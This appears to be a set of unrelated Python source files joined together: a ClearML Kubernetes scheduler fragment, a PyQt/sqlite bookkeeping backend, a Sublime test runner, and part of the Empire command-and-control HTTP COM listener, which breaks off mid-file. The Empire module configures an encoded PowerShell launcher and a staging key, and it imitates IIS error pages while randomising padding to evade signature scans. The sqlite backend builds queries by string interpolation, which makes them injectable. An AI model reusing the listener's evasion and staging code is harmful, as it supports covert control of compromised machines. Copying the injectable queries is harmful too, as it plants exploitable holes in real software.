super(K8sIntegration, self).__init__()
self.k8s_pending_queue_name = k8s_pending_queue_name or self.K8S_PENDING_QUEUE
self.kubectl_cmd = kubectl_cmd or self.KUBECTL_RUN_CMD
self.container_bash_script = container_bash_script or self.CONTAINER_BASH_SCRIPT
# Always do system packages, because by we will be running inside a docker
self._session.config.put("agent.package_manager.system_site_packages", True)
# Add debug logging
if debug:
self.log.logger.disabled = False
self.log.logger.setLevel(logging.INFO)
self.ports_mode = ports_mode
self.num_of_services = num_of_services
self.base_pod_num = base_pod_num
self._edit_hyperparams_support = None
self._user_props_cb = user_props_cb
self.conf_file_content = None
self.overrides_json_string = None
self.template_dict = None
self.extra_bash_init_script = extra_bash_init_script or None
if self.extra_bash_init_script and not isinstance(self.extra_bash_init_script, str):
self.extra_bash_init_script = ' ; '.join(self.extra_bash_init_script) # noqa
self.namespace = namespace or self.K8S_DEFAULT_NAMESPACE
self.pod_limits = []
self.pod_requests = []
self.max_pods_limit = max_pods_limit if not self.ports_mode else None
if overrides_yaml:
with open(os.path.expandvars(os.path.expanduser(str(overrides_yaml))), 'rt') as f:
overrides = yaml.load(f, Loader=getattr(yaml, 'FullLoader', None))
if overrides:
containers = overrides.get('spec', {}).get('containers', [])
for c in containers:
resources = {str(k).lower(): v for k, v in c.get('resources', {}).items()}
if not resources:
continue
if resources.get('limits'):
self.pod_limits += ['{}={}'.format(k, v) for k, v in resources['limits'].items()]
if resources.get('requests'):
self.pod_requests += ['{}={}'.format(k, v) for k, v in resources['requests'].items()]
# remove double entries
self.pod_limits = list(set(self.pod_limits))
self.pod_requests = list(set(self.pod_requests))
if self.pod_limits or self.pod_requests:
self.log.warning('Found pod container requests={} limits={}'.format(
self.pod_limits, self.pod_requests))
if containers:
self.log.warning('Removing containers section: {}'.format(overrides['spec'].pop('containers')))
self.overrides_json_string = json.dumps(overrides)
if template_yaml:
with open(os.path.expandvars(os.path.expanduser(str(template_yaml))), 'rt') as f:
self.template_dict = yaml.load(f, Loader=getattr(yaml, 'FullLoader', None))
clearml_conf_file = clearml_conf_file or kwargs.get('trains_conf_file')
if clearml_conf_file:
with open(os.path.expandvars(os.path.expanduser(str(clearml_conf_file))), 'rt') as f:
self.conf_file_content = f.read()
# make sure we use system packages!
self.conf_file_content += '\nagent.package_manager.system_site_packages=true\n'
self._monitor_hanging_pods()
def _monitor_hanging_pods(self):
_check_pod_thread = Thread(target=self._monitor_hanging_pods_daemon)
_check_pod_thread.daemon = True
_check_pod_thread.start()
def _monitor_hanging_pods_daemon(self):
while True:
output = get_bash_output('kubectl get pods -n {namespace} -o=JSON'.format(
namespace=self.namespace
))
output = '' if not output else output if isinstance(output, str) else output.decode('utf-8')
try:
output_config = json.loads(output)
except Exception as ex:
self.log.warning('K8S Glue pods monitor: Failed parsing kubectl output:\n{}\nEx: {}'.format(output, ex))
sleep(self._polling_interval)
continue
pods = output_config.get('items', [])
for pod in pods:
try:
reason = functools.reduce(
lambda a, b: a[b], ('status', 'containerStatuses', 0, 'state', 'waiting', 'reason'), pod
)
except (IndexError, KeyError):
continue
if reason == 'ImagePullBackOff':
pod_name = pod.get('metadata', {}).get('name', None)
if pod_name:
task_id = pod_name.rpartition('-')[-1]
delete_pod_cmd = 'kubectl delete pods {} -n {}'.format(pod_name, self.namespace)
get_bash_output(delete_pod_cmd)
try:
self._session.api_client.tasks.failed(
task=task_id,
status_reason="K8S glue error due to ImagePullBackOff",
status_message="Changed by K8S glue",
force=True
)
except Exception as ex:
self.log.warning(
'K8S Glue pods monitor: Failed deleting task "{}"\nEX: {}'.format(task_id, ex)
)
sleep(self._polling_interval)
def _set_task_user_properties(self, task_id: str, **properties: str):
if self._edit_hyperparams_support is not True:
# either not supported or never tested
if self._edit_hyperparams_support == self._session.api_version:
# tested against latest api_version, not supported
return
if not self._session.check_min_api_version(self._edit_hyperparams_version):
# not supported due to insufficient api_version
self._edit_hyperparams_support = self._session.api_version
return
try:
self._session.get(
service="tasks",
action="edit_hyper_params",
task=task_id,
hyperparams=[
{
"section": "properties",
"name": k,
"value": str(v),
}
for k, v in properties.items()
],
)
# definitely supported
self._runtime_props_support = True
except APIError as error:
if error.code == 404:
self._edit_hyperparams_support = self._session.api_version
def run_one_task(self, queue: Text, task_id: Text, worker_args=None, **_):
print('Pulling task {} launching on kubernetes cluster'.format(task_id))
task_data = self._session.api_client.tasks.get_all(id=[task_id])[0]
# push task into the k8s queue, so we have visibility on pending tasks in the k8s scheduler
try:
print('Pushing task {} into temporary pending queue'.format(task_id))
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(task_id, queue=self.k8s_pending_queue_name,
status_reason='k8s pending scheduler')
except Exception as e:
self.log.error("ERROR: Could not push back task [{}] to k8s pending queue [{}], error: {}".format(
task_id, self.k8s_pending_queue_name, e))
return
container = get_task_container(self._session, task_id)
if not container.get('image'):
container['image'] = str(
ENV_DOCKER_IMAGE.get() or self._session.config.get("agent.default_docker.image", "nvidia/cuda")
)
container['arguments'] = self._session.config.get("agent.default_docker.arguments", None)
# get the clearml.conf encoded file
# noinspection PyProtectedMember
hocon_config_encoded = (
self.conf_file_content
or Path(self._session._config_file).read_text()
).encode("ascii")
create_clearml_conf = "echo '{}' | base64 --decode >> ~/clearml.conf".format(
base64.b64encode(
hocon_config_encoded
).decode('ascii')
)
if self.ports_mode:
print("Kubernetes looking for available pod to use")
# noinspection PyBroadException
try:
queue_name = self._session.api_client.queues.get_by_id(queue=queue).name
except Exception:
queue_name = 'k8s'
# Search for a free pod number
pod_count = 0
pod_number = self.base_pod_num
while self.ports_mode or self.max_pods_limit:
pod_number = self.base_pod_num + pod_count
if self.ports_mode:
kubectl_cmd_new = "kubectl get pods -l {pod_label},{agent_label} -n {namespace}".format(
pod_label=self.LIMIT_POD_LABEL.format(pod_number=pod_number),
agent_label=self.AGENT_LABEL,
namespace=self.namespace,
)
else:
kubectl_cmd_new = "kubectl get pods -l {agent_label} -n {namespace} -o json".format(
agent_label=self.AGENT_LABEL,
namespace=self.namespace,
)
process = subprocess.Popen(kubectl_cmd_new.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
output = '' if not output else output if isinstance(output, str) else output.decode('utf-8')
error = '' if not error else error if isinstance(error, str) else error.decode('utf-8')
if not output:
# No such pod exist so we can use the pod_number we found
break
if self.max_pods_limit:
try:
current_pod_count = len(json.loads(output).get("items", []))
except (ValueError, TypeError) as ex:
self.log.warning(
"K8S Glue pods monitor: Failed parsing kubectl output:\n{}\ntask '{}' "
"will be enqueued back to queue '{}'\nEx: {}".format(
output, task_id, queue, ex
)
)
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(task_id, queue=queue, status_reason='kubectl parsing error')
return
max_count = self.max_pods_limit
else:
current_pod_count = pod_count
max_count = self.num_of_services - 1
if current_pod_count >= max_count:
# All pods are taken, exit
self.log.debug(
"kubectl last result: {}\n{}".format(error, output))
self.log.warning(
"All k8s services are in use, task '{}' "
"will be enqueued back to queue '{}'".format(
task_id, queue
)
)
self._session.api_client.tasks.reset(task_id)
self._session.api_client.tasks.enqueue(
task_id, queue=queue, status_reason='k8s max pod limit (no free k8s service)')
return
elif self.max_pods_limit:
# max pods limit hasn't reached yet, so we can create the pod
break
pod_count += 1
labels = ([self.LIMIT_POD_LABEL.format(pod_number=pod_number)] if self.ports_mode else []) + [self.AGENT_LABEL]
labels.append("clearml-agent-queue={}".format(self._safe_k8s_label_value(queue)))
labels.append("clearml-agent-queue-name={}".format(self._safe_k8s_label_value(queue_name)))
if self.ports_mode:
print("Kubernetes scheduling task id={} on pod={} (pod_count={})".format(task_id, pod_number, pod_count))
else:
print("Kubernetes scheduling task id={}".format(task_id))
kubectl_kwargs = dict(
create_clearml_conf=create_clearml_conf,
labels=labels,
docker_image=container['image'],
docker_args=container['arguments'],
docker_bash=container.get('setup_shell_script'),
task_id=task_id,
queue=queue
)
if self.template_dict:
output, error = self._kubectl_apply(**kubectl_kwargs)
else:
output, error = self._kubectl_run(task_data=task_data, **kubectl_kwargs)
error = '' if not error else (error if isinstance(error, str) else error.decode('utf-8'))
output = '' if not output else (output if isinstance(output, str) else output.decode('utf-8'))
print('kubectl output:\n{}\n{}'.format(error, output))
if error:
send_log = "Running kubectl encountered an error: {}".format(error)
self.log.error(send_log)
self.send_logs(task_id, send_log.splitlines())
user_props = {"k8s-queue": str(queue_name)}
if self.ports_mode:
user_props.update(
{
"k8s-pod-number": pod_number,
"k8s-pod-label": labels[0],
"k8s-internal-pod-count": pod_count,
}
)
if self._user_props_cb:
# noinspection PyBroadException
try:
custom_props = self._user_props_cb(pod_number) if self.ports_mode else self._user_props_cb()
user_props.update(custom_props)
except Exception:
pass
if user_props:
self._set_task_user_properties(
task_id=task_id,
**user_props
)
def _get_docker_args(self, docker_args, flags, target=None, convert=None):
# type: (List[str], Collection[str], Optional[str], Callable[[str], Any]) -> Union[dict, List[str]]
"""
Get docker args matching specific flags.
:argument docker_args: List of docker argument strings (flags and values)
:argument flags: List of flags/names to intercept (e.g. "--env" etc.)
:argument target: Controls return format. If provided, returns a dict with a target field containing a list
of result strings, otherwise returns a list of result strings
:argument convert: Optional conversion function for each result string
"""
args = docker_args[:] if docker_args else []
results = []
while args:
cmd = args.pop(0).strip()
if cmd in flags:
env = args.pop(0).strip()
if convert:
env = convert(env)
results.append(env)
else:
self.log.warning('skipping docker argument {} (only -e --env supported)'.format(cmd))
if target:
return {target: results} if results else {}
return results
def _kubectl_apply(self, create_clearml_conf, docker_image, docker_args, docker_bash, labels, queue, task_id):
template = deepcopy(self.template_dict)
template.setdefault('apiVersion', 'v1')
template['kind'] = 'Pod'
template.setdefault('metadata', {})
name = 'clearml-id-{task_id}'.format(task_id=task_id)
template['metadata']['name'] = name
template.setdefault('spec', {})
template['spec'].setdefault('containers', [])
template['spec'].setdefault('restartPolicy', 'Never')
if labels:
labels_dict = dict(pair.split('=', 1) for pair in labels)
template['metadata'].setdefault('labels', {})
template['metadata']['labels'].update(labels_dict)
container = self._get_docker_args(
docker_args,
target="env",
flags={"-e", "--env"},
convert=lambda env: {'name': env.partition("=")[0], 'value': env.partition("=")[2]},
)
container_bash_script = [self.container_bash_script] if isinstance(self.container_bash_script, str) \
else self.container_bash_script
extra_docker_bash_script = '\n'.join(self._session.config.get("agent.extra_docker_shell_script", None) or [])
if docker_bash:
extra_docker_bash_script += '\n' + str(docker_bash) + '\n'
script_encoded = '\n'.join(
['#!/bin/bash', ] +
[line.format(extra_bash_init_cmd=self.extra_bash_init_script or '',
task_id=task_id,
extra_docker_bash_script=extra_docker_bash_script)
for line in container_bash_script])
create_init_script = \
"echo '{}' | base64 --decode >> ~/__start_agent__.sh ; " \
"/bin/bash ~/__start_agent__.sh".format(
base64.b64encode(
script_encoded.encode('ascii')
).decode('ascii'))
# Notice: we always leave with exit code 0, so pods are never restarted
container = self._merge_containers(
container,
dict(name=name, image=docker_image,
command=['/bin/bash'],
args=['-c', '{} ; {} ; exit 0'.format(create_clearml_conf, create_init_script)])
)
if template['spec']['containers']:
template['spec']['containers'][0] = self._merge_containers(template['spec']['containers'][0], container)
else:
template['spec']['containers'].append(container)
if self._docker_force_pull:
for c in template['spec']['containers']:
c.setdefault('imagePullPolicy', 'Always')
fp, yaml_file = tempfile.mkstemp(prefix='clearml_k8stmpl_', suffix='.yml')
os.close(fp)
with open(yaml_file, 'wt') as f:
yaml.dump(template, f)
kubectl_cmd = self.KUBECTL_APPLY_CMD.format(
task_id=task_id,
docker_image=docker_image,
queue_id=queue,
namespace=self.namespace
)
# make sure we provide a list
if isinstance(kubectl_cmd, str):
kubectl_cmd = kubectl_cmd.split()
# add the template file at the end
kubectl_cmd += [yaml_file]
try:
process = subprocess.Popen(kubectl_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
except Exception as ex:
return None, str(ex)
finally:
safe_remove_file(yaml_file)
return output, error
def _kubectl_run(
self, create_clearml_conf, docker_image, docker_args, docker_bash, labels, queue, task_data, task_id
):
if callable(self.kubectl_cmd):
kubectl_cmd = self.kubectl_cmd(task_id, docker_image, docker_args, queue, task_data)
else:
kubectl_cmd = self.kubectl_cmd.format(
task_id=task_id,
docker_image=docker_image,
docker_args=" ".join(self._get_docker_args(
docker_args, flags={"-e", "--env"}, convert=lambda env: '--env={}'.format(env))
),
queue_id=queue,
namespace=self.namespace,
)
# make sure we provide a list
if isinstance(kubectl_cmd, str):
kubectl_cmd = kubectl_cmd.split()
if self.overrides_json_string:
kubectl_cmd += ['--overrides=' + self.overrides_json_string]
if self.pod_limits:
kubectl_cmd += ['--limits', ",".join(self.pod_limits)]
if self.pod_requests:
kubectl_cmd += ['--requests', ",".join(self.pod_requests)]
if self._docker_force_pull and not any(x.startswith("--image-pull-policy=") for x in kubectl_cmd):
kubectl_cmd += ["--image-pull-policy='always'"]
container_bash_script = [self.container_bash_script] if isinstance(self.container_bash_script, str) \
else self.container_bash_script
container_bash_script = ' ; '.join(container_bash_script)
kubectl_cmd += [
"--labels=" + ",".join(labels),
"--command",
"--",
"/bin/sh",
"-c",
"{} ; {}".format(create_clearml_conf, container_bash_script.format(
extra_bash_init_cmd=self.extra_bash_init_script or "",
extra_docker_bash_script=docker_bash or "",
task_id=task_id
)),
]
process = subprocess.Popen(kubectl_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
return output, error
def run_tasks_loop(self, queues: List[Text], worker_params, **kwargs):
"""
:summary: Pull and run tasks from queues.
:description: 1. Go through ``queues`` by order.
2. Try getting the next task for each and run the first one that returns.
3. Go to step 1
:param queues: IDs of queues to pull tasks from
:type queues: list of ``Text``
:param worker_params: Worker command line arguments
:type worker_params: ``clearml_agent.helper.process.WorkerParams``
"""
events_service = self.get_service(Events)
# make sure we have a k8s pending queue
# noinspection PyBroadException
try:
self._session.api_client.queues.create(self.k8s_pending_queue_name)
except Exception:
pass
# get queue id
self.k8s_pending_queue_name = self._resolve_name(self.k8s_pending_queue_name, "queues")
_last_machine_update_ts = 0
while True:
# iterate over queues (priority style, queues[0] is highest)
for queue in queues:
# delete old completed / failed pods
get_bash_output(self.KUBECTL_DELETE_CMD.format(namespace=self.namespace, selector=self.AGENT_LABEL))
# get next task in queue
try:
response = self._session.api_client.queues.get_next_task(queue=queue)
except Exception as e:
print("Warning: Could not access task queue [{}], error: {}".format(queue, e))
continue
else:
try:
task_id = response.entry.task
except AttributeError:
print("No tasks in queue {}".format(queue))
continue
events_service.send_log_events(
self.worker_id,
task_id=task_id,
lines="task {} pulled from {} by worker {}".format(
task_id, queue, self.worker_id
),
level="INFO",
)
self.report_monitor(ResourceMonitor.StatusReport(queues=queues, queue=queue, task=task_id))
self.run_one_task(queue, task_id, worker_params)
self.report_monitor(ResourceMonitor.StatusReport(queues=self.queues))
break
else:
# sleep and retry polling
print("No tasks in Queues, sleeping for {:.1f} seconds".format(self._polling_interval))
sleep(self._polling_interval)
if self._session.config["agent.reload_config"]:
self.reload_config()
def k8s_daemon(self, queue):
"""
Start the k8s Glue service.
This service will be pulling tasks from *queue* and scheduling them for execution using kubectl.
Notice all scheduled tasks are pushed back into K8S_PENDING_QUEUE,
and popped when execution actually starts. This creates full visibility into the k8s scheduler.
Manually popping a task from the K8S_PENDING_QUEUE,
will cause the k8s scheduler to skip the execution once the scheduled tasks needs to be executed
:param list(str) queue: queue name to pull from
"""
return self.daemon(queues=[ObjectID(name=queue)] if queue else None,
log_level=logging.INFO, foreground=True, docker=False)
@classmethod
def get_ssh_server_bash(cls, ssh_port_number):
return ' ; '.join(line.format(port=ssh_port_number) for line in cls.BASH_INSTALL_SSH_CMD)
@staticmethod
def _merge_containers(c1, c2):
def merge_env(k, d1, d2, not_set):
if k != "env":
return not_set
# Merge environment lists, second list overrides first
return list({
item['name']: item for envs in (d1, d2) for item in envs
}.values())
return merge_dicts(
c1, c2, custom_merge_func=merge_env
)
@staticmethod
def _safe_k8s_label_value(value):
""" Conform string to k8s standards for a label value """
value = value.lower().strip()
value = re.sub(r'^[^A-Za-z0-9]+', '', value) # strip leading non-alphanumeric chars
value = re.sub(r'[^A-Za-z0-9]+$', '', value) # strip trailing non-alphanumeric chars
value = re.sub(r'\W+', '-', value) # allow only word chars (this removed "." which is supported, but nvm)
value = re.sub(r'-+', '-', value) # don't leave messy "--" after replacing previous chars
return value[:63]
|
func.py
|
from genericpath import exists
import os
import threading
import sqlite3
from datetime import datetime
from PyQt5.QtCore import QObject, pyqtSlot, pyqtSignal
class Backend(QObject):
def __init__(self):
super().__init__()
self.officer = ''
returnNames = pyqtSignal(list, arguments=['returnRes'])
returnOfficerCollections = pyqtSignal(list, arguments=['returnedCollections'])
savingRecord = pyqtSignal(str, arguments=['saveRec'])
savedRecord = pyqtSignal(list, arguments=['savedRec'])
savingError = pyqtSignal(str, arguments=['savingError'])
def num_exists(self, num):
conn = sqlite3.connect('clients.db')
cursor = conn.cursor()
sql = f"SELECT no FROM clients WHERE no = {num}"
cursor.execute(sql)
db = cursor.fetchall()
conn.commit()
conn.close()
if db:
return True
def add_record(self, name, num):
"""
Add record for client if client doesn't exit
"""
name = name.title()
conn = sqlite3.connect('clients.db')
cursor = conn.cursor()
sql = "INSERT INTO clients VALUES (?, ?, ?)"
cursor.execute(sql, (num, name, 0))
conn.commit()
conn.close()
@pyqtSlot(str)
def get_names(self, patt):
g_thread = threading.Thread(target=self._get_names, args=[patt])
g_thread.daemon = True
g_thread.start()
def _get_names(self, patt):
conn = sqlite3.connect('clients.db')
cursor = conn.cursor()
cond = f"'%{patt}%'"
sql = "SELECT no, name FROM clients WHERE name LIKE " + cond
cursor.execute(sql)
db = cursor.fetchall()
conn.commit()
conn.close()
names = []
for item in db:
obj = {}
obj['num'] = item[0]
obj['name'] = item[1]
names.append(obj)
self.returnRes(names)
@pyqtSlot(str)
def get_officer_collections(self, officer: str = ''):
g_thread = threading.Thread(target=self._get_officer_collections, args=[officer])
g_thread.daemon = True
g_thread.start()
def _get_officer_collections(self, officer: str = ''):
"""
Get collections according to the name of the officer
"""
db_name = f"daily-contrib.db"
if not os.path.exists(db_name):
return
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
sql = "SELECT acc_no, acc_name, deposit, installation, withdrawal, officer, `date` FROM daily_contributions ORDER BY `date` DESC"
cursor.execute(sql)
db = cursor.fetchall()
conn.commit()
conn.close()
names = []
for item in db:
obj = {}
obj['account_no'] = str(item[0])
obj['fullname'] = item[1]
obj['deposit'] = int(item[2])
obj['installments'] = int(item[3])
obj['withdrawal'] = int(item[4])
obj['officer'] = item[5]
obj['payment_date'] = item[6].split('T')[0]
names.append(obj)
self.returnOfficerCollections.emit(names)
def returnRes(self, names):
self.returnNames.emit(names)
def save_contrib(self, officer, num, name, deposit, installments, withdrawal):
"""
Save daily contrib information to the database
"""
# emit signal
self.savingRecord.emit('')
name = name.title()
officer = officer.lower()
date_str = datetime.utcnow().isoformat()
officer = self.officer
db_name = f"daily-contrib.db"
if not os.path.exists(db_name):
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
tables = "uid INTEGER AUTO_INCREMENT PRIMARY KEY, acc_no Number, acc_name text, "
tables += "deposit Number, installation Number, "
tables += "withdrawal Number, officer text, "
tables += "date TIMESTAMP DEFAULT CURRENT_TIMESTAMP, "
tables += "update_date TIMESTAMP CURRENT_TIMESTAMP"
sql = f"CREATE TABLE daily_contributions ({tables})"
cursor.execute(sql)
conn.commit()
conn.close()
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
sql = "INSERT INTO daily_contributions (acc_no, acc_name, deposit, installation, withdrawal, officer, `date`) VALUES (?, ?, ?, ?, ?, ?, ?)"
cursor.execute(sql, (num, name, deposit, installments, withdrawal, officer, date_str))
conn.commit()
record = []
obj = {}
obj['account_no'] = str(num)
obj['fullname'] = name
obj['deposit'] = deposit
obj['installments'] = installments
obj['withdrawal'] = withdrawal
obj['officer'] = officer
obj['payment_date'] = date_str.split('T')[0]
record.append(obj)
self.savedRecord.emit(record)
conn.close()
@pyqtSlot(int, str, float, float, float)
def save_and_exit(self, *args):
se_thread = threading.Thread(target=self._save_and_exit, args=[*args])
se_thread.daemon = True
se_thread.start()
def _save_and_exit(self, num, name, deposit, installments, withdrawal, date='', officer='maxwell'):
print(num, name)
if not self.num_exists(num):
self.add_record(name, num)
self.save_contrib(officer, num, name, deposit, installments, withdrawal)
@pyqtSlot(str, str, str, str, str)
def save_and_add(self, *args):
se_thread = threading.Thread(target=self._save_and_add, args=[*args])
se_thread.daemon = True
se_thread.start()
def _save_and_add(self, num, name, deposit, installments, withdrawal, date='', officer='maxwell'):
print(num, name)
if not self.num_exists(num):
self.add_record(name, num)
self.save_contrib(officer, num, name, deposit, installments, withdrawal)
|
test_package.py
|
import sublime
import sublime_plugin
import sys
import os
import logging
from unittest import TextTestRunner, TestSuite
from .core import TestLoader, DeferringTextTestRunner, DeferrableTestCase
from .mixin import UnitTestingMixin
from .const import DONE_MESSAGE
from .utils import ProgressBar, StdioSplitter
import threading
class UnitTestingCommand(sublime_plugin.ApplicationCommand, UnitTestingMixin):
def run(self, package=None, **kargs):
if not package:
self.prompt_package(lambda x: self.run(x, **kargs))
return
package, pattern = self.input_parser(package)
settings = self.load_unittesting_settings(package, pattern=pattern, **kargs)
stream = self.load_stream(package, settings)
if settings["async"]:
threading.Thread(target=lambda: self.unit_testing(stream, package, settings)).start()
else:
self.unit_testing(stream, package, settings)
def verify_testsuite(self, tests):
for t in tests:
if isinstance(t, TestSuite):
self.verify_testsuite(t)
if isinstance(t, DeferrableTestCase):
raise Exception("DeferrableTestCase is used but `deferred` is `false`.")
def unit_testing(self, stream, package, settings, cleanup_hooks=[]):
if settings["capture_console"]:
stdout = sys.stdout
stderr = sys.stderr
handler = logging.StreamHandler(stream)
logging.root.addHandler(handler)
sys.stdout = StdioSplitter(stdout, stream)
sys.stderr = StdioSplitter(stderr, stream)
testRunner = None
progress_bar = ProgressBar("Testing %s" % package)
progress_bar.start()
try:
# use custom loader which supports reloading modules
self.remove_test_modules(package, settings["tests_dir"])
loader = TestLoader(settings["deferred"])
tests = loader.discover(os.path.join(
sublime.packages_path(), package, settings["tests_dir"]), settings["pattern"]
)
# use deferred test runner or default test runner
if settings["deferred"]:
testRunner = DeferringTextTestRunner(stream, verbosity=settings["verbosity"])
else:
self.verify_testsuite(tests)
testRunner = TextTestRunner(stream, verbosity=settings["verbosity"])
testRunner.run(tests)
except Exception as e:
if not stream.closed:
stream.write("ERROR: %s\n" % e)
# force clean up
testRunner = None
finally:
def cleanup(status=0):
if not settings["deferred"] or not testRunner or \
testRunner.finished or status > 600:
self.remove_test_modules(package, settings["tests_dir"])
progress_bar.stop()
for hook in cleanup_hooks:
hook()
if not hasattr(stream, 'window'):
# If it's an output panel don't print done message,
# because it's only required for CI test runs.
stream.write("\n")
stream.write(DONE_MESSAGE)
stream.close()
if settings["capture_console"]:
sys.stdout = stdout
sys.stderr = stderr
# remove stream set by logging.root.addHandler
logging.root.removeHandler(handler)
else:
sublime.set_timeout(lambda: cleanup(status + 1), 500)
cleanup()
|
http_com.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import sys
import time
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from werkzeug.serving import WSGIRequestHandler
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import packets
from empire.server.utils import data_util
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
